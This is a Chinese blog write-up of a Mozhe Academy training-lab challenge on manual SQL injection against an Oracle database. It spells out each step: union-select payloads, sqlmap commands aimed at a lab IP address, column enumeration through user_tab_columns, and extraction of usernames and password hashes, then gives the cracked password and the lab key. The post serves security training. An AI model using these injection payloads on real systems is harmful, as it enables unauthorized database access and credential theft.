墨者学院手工注入题解(oracle数据库)

白十七122024-08-26 16:30

简介

Oracle 数据库系统，是美国ORACLE公司（甲⻣⽂）提供的以分布式数据库为核⼼的⼀组软件产品。是⽬前世界上使⽤最为⼴泛的，数据库管理系统。

以下是手工注入的流程：

1、判断注入点

使用 and 1=1 进行拼接

2、确定字段数

使用语句 order by

最终确定为只有两个字段

3、确定返回点

使用语句 ?id=-1 union select 'null','null' from dual

4、确定数据库名称

使用语句 sqlmap -u http://124.70.64.48:43361/new_list.php?id=1 --current-db 查看当前数据库

5、确定数据库中的表名

使用语句 sqlmap -u http://124.70.64.48:43361/new_list.php?id=1 -D SYSTEM --tables

6、查询列名

使用语句 id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%') from dual 进行模糊搜索

确定第一列为 user_name

使用语句 id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%' and column_name <> 'USER_NAME') from dual 进行模糊搜索

确定第二列为 user_pwd

7、获取账号以及密码

使用语句 new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1

确定zhong 的密码为 1c63129ae9asc60asdua94d3e00495

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'

确定 hu 的密码为 1c63129ae9db9g20asdua94d3e00495

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'

确定 mozhe 的密码为 48b58ef8be01ef64e7de3f764ec83d2d

8、使用MD5进行密码解密

最终确定 mozhe 的密码为 267581

9、登录后台

10、提交KEY

KEY：mozhe89c06b9c5a5b67c98c500a1ce66

安全

网络安全靠人民，网络安全为人民

上一篇：linux下的oracle启动命令

下一篇：如何向linux社区提交一个新的驱动或patch

热门推荐

01GitHub 镜像站点 02【AI】2026 年具身智能模型和世界模型总结 03【踩坑记录 | 第一篇】微软商店无法使用时，如何手动安装 OpenAI Codex？附`.msix`文件系统错误解决方法 042026 年 AI 编程工具终极横评：Cursor vs Claude Code vs Copilot vs Windsurf 05Codex 接入 DeepSeek API 完整配置文档 06CC-Switch & Claude 基于 Linux 服务器安装使用指南 07裂开！ChatGPT 居然开始要手机号验证，附详细解决方法 08DeepSeek V4 + Claude Code thinking mode 400 错误修复方案 09几个好用的ip纯净度检测网站 10API Key 登录 Codex 也能用插件了，还支持会话删除和导出